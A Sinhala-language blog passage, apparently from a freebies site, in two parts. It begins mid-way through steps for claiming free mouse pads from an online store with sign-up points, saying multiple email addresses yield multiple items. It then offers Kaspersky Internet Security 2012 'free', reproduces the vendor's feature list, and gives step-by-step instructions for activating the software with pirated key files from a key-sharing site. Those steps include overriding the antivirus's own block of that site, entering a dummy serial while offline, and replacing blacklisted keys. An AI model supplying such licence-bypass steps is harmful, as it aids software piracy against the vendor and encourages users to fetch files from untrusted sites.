5. හරි. දැන් තමයි වැඩේ පටන් ගන්න තියෙන්නේ. දැන් ඔය Page එකේ තියෙන Search Bar එකේ “C571″ කියලා ටයිප් කරලා Go! බොත්තමට කොටන්න.
6. හරි! දැන් ඔය තියෙන්නේ ඔයාගේ Mouse Pad එක. එතන තියෙන Add to cart බොත්තමට කොටන්න.
7. දැන් Added to your Shopping Cart කියලා තියෙන තැන Shopping Cart කියන එක Click කරන්න.
8. දැන් ඔය TomTop Points කියලා තියෙන තැන 70 type කරලා Apply Points යන්න.
9. දැන් Proceed To Checkout Click කරන්න.
10. ඔය ලබා දෙන Form එකේ ඔයාගේ විස්තර ටික දීල Continue Click කරන්න.
( මතක ඇතුව Ship to this address කියන එක තෝරලා දෙන්න)
11. හරි. දැන් Shipping Method ඒකට free (0.00USD) දීල තියෙන option එක තෝරලා Continue
කරන්න.
12. දැන් Payment Options වල Pay with Points දීල Continue කරන්න.
13.දැන් Order Review වල Place Order Click කරන්න.
14. වැඩේ ගොඩ! Continue Shopping Click කරලා ඊට පස්සේ Logout වෙන්න.
හරියටම හරි! Mouse Pad එක සති 2-3 ක් වෙද්දී ගෙදරටම එයි!
මේ  විදියට ඔයාලට Mouse Pad 20 ක් උනත් ගෙන්න ගන්න පුළුවන්, හැබැයි E-mail Addresses 20 ක් තියෙන්න ඕනි!
ඔබට ස්තුතියි !

Kaspersky Internet Security 2012 නොමිලේ!!!

Kaspersky Internet Security 2012 නොමිලේ!!!


ඔන්න අදත් ආවා සුපිරි වයිරස් ගාර්ඩ් එකකුත් අරගෙනම.
දන්නවනේ මේක මොකක් ද කියල. මේක තමයි දැනට ලෝකේ ප්‍රසිද්ධම වයිරස් ගාර්ඩ් එක.
වයිරස් ද, ට්‍රෝජන් ද, වර්ම්ස් ද , ඕන දෙයක් අල්ලන්න දෙයියා!!!!!
ඒ වගේම, කවදාවත් ක්‍රැක් කරන්න බැරි සොෆ්ට්වෙයා එකක් තියෙනවනම්, මේක තමයි ඒක!!!!
( ඒ කියන්නේ, Application එක Modify කරන්න User ට වත් බෑ. එහෙනම් ඉතින් වයිරස් වලට කොහොමත් බෑ නේ! )
ඒ විතරක් යැ. මේකේ යූසර් ඉන්ටර්ෆේස් (User – Interface ) එකත් සුපිරි!!!

මෙන්න වැඩි විස්තර :
Benefits
Enjoy secure online banking and shopping
Kaspersky Internet Security 2012 warns you about potential phishing attacks and malicious websites and secures your sensitive personal information such as login credentials, credit card details, etc. Enjoy complete peace of mind when you shop and bank online!
Get effective protection from unknown threats
Block unknown malware threats with the help of automatic monitoring, analysis and Kaspersky Lab’s cloud-based technologies that detect malware behavior patterns in application and system activities before they can harm your PC.
Communicate in safety on your favorite social networks
Our security software constantly monitors Internet traffic and protects you from accidentally launching malware or following links to phishing websites when you are using Facebook, Twitter and other social networks. Plus, your account details, pictures and other personal information stay safe.
Get immediate protection from emerging threats
Keep your computer protected against the latest malware threats with the help of cloud-based technologies that leverage information from the Kaspersky Security Network [KSN] – Kaspersky Lab’s globally-distributed threat monitoring network which gathers information regarding new threats from millions of users’ computers around the globe.
Roll back changes made by malware
Safely undo changes that malware makes to your computer, ensuring no harm comes to your PC.
Benefit from hybrid protection
Whenever and wherever you use your PC and the Internet, take advantage of hybrid protection that brings together the latest information about malware threats from the cloud with the security capabilities in Kaspersky Internet Security 2012 installed on your computer for unbeatable protection.
Protect your identity from phishing attacks
Prevent cybercriminals from stealing your digital identity thanks to anti-phishing protection technologies inside Kaspersky Lab’s Internet security software which leverage lists of known phishing websites, proactive anti-phishing technologies and the latest information from the cloud.
Supervise your children’s computer use
You manage when and how often your children access the PC and Internet and which games, websites and applications they use. Plus, you choose who your children communicate with via Instant Messaging and social networks and what their messages contain using predefined rules.
හරි කතාව තියල පහල තියෙන Download Now බොත්තමට කොටලා Trial Version එක බා ගන්න.

සැ.යු. : මෙතනින් ඔයාලගේ Email එක ඉල්ලයි. ඒක දීල Download බොත්තම ක්ලික් කරන්න.
දැන් ඉතින් Install කරගන්න එකයි තියෙන්නේ.
Install කරලා ඉවර උනාම තමයි අවුල. කොහොමද මේක Active කරන්නේ?
හරිම සිම්පල්.
1 . මෙන්න මේ Site එකට යන්න. (සමහරවිට කැස්පර්ස්කි එකෙන් මේක Block කරන්න බලයි, එතකොට “Click here if you believe that the web page was blocked in error” කියන එක ක්ලික් කරන්න.)
2. අම්ම මුත්තා කාලේවත් දැකල නැති අකුරු ටිකක් තියෙන ( රුසියන් භාෂාව ) Message එකක් එයි ඉස්සෙල්ලම. ඒකෙ යට තියෙන හරි ලකුණ Select කරලා Close කරන්න.
3. එතන වම් පැත්තේ Kaspersky Internet Security 2012 කියල තියෙන ලින්කුව ක්ලික් කරන්න. එතකොට Key Files ගොඩක්ම පෙන්නයි. එතනින් කැමති එකක් උඩ ක්ලික් කරන්න.
4. එතකොට ඔයාල වෙන site එකකට Redirect වෙයි. ඒක Close කරන්න.
5. දැන් අයෙමත් keys ටික පෙන්නයි, ආයෙම Key එක උඩ ක්ලික් කරන්න. එතකොට ඒක Download කරන්න අහවි. ඒක Download කරන්න.
6. දැන් Internet එකෙන් Disconnect වෙන්න.
7. දැන් අර Activate The application කියල ආවේ (Install කරලා ඉවර උනාම) ඒකෙ activate using Activation Code කියල තියෙන තැන මෙන්න මේ serial එක ටයිප් කරන්න.
11111-11111-11111-1111X
8. දැන් Next කරන්න. එතකොට serial එක වැරදි කියල, key file එකක් තියෙනවානම් ඒක Insert කරන්න එයි. ( අර Browse කරන්න තියෙන තැන )
9. එතනින් අර කලින් බාපු Key File එක දීල Next කරන්න.
වැඩේ හරි!!!!
( Key එක Expire වුනොත් හරි Blacklist වුනොත් හරි ආපහුhttp://www.kavkiskey.org එකට ගිහින් අලුත්ම Key එකක් ගතහැකි. )
දැන් ඉතින් Internet Connect වෙලා Update පාරක් දාල ඕනනං Scan එකකුත් කරන්න.